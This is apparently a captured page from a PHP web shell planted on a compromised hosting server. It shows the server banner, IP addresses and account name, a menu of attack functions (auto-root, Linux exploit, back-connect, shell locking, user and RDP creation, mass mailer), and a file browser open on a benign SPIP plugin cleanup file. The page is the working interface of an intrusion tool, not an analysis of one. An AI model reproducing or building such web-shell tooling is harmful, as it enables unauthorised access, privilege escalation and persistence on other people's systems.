Linux webm008.cluster115.gra.hosting.ovh.net 6.18.42-ovh-vps-grsec-zfs+ #1 SMP PREEMPT_DYNAMIC Wed Aug 5 15:59:48 CEST 2026 x86_64
Apache
: 10.115.20.8 | : 216.73.216.59
Cant Read [ /etc/named.conf ]
8.1.34
quelfutuu
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
home /
quelfutuu /
www /
plugins-dist /
bigup /
genie /
[ HOME SHELL ]
Name
Size
Permission
Action
bigup_nettoyer_repertoire_uplo...
597
B
-rw----r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : bigup_nettoyer_repertoire_upload.php
<?php /** * Tache de nettoyages de fichiers du plugin Big Upload * * @plugin Big Upload * @copyright 2015 * @author Matthieu Marcillaud * @licence GNU/GPL * @package SPIP\Bigup\Genie */ if (!defined('_ECRIRE_INC_VERSION')) { return; } /** * Enlève les fichiers du répertoire de travail de bigup qui sont trop vieux * * @param int $last * @return int **/ function genie_bigup_nettoyer_repertoire_upload_dist($last) { include_spip('inc/Bigup/GestionRepertoires'); \Spip\Bigup\GestionRepertoires::nettoyer_repertoire_recursif(_DIR_TMP . 'bigupload'); return 1; }
Close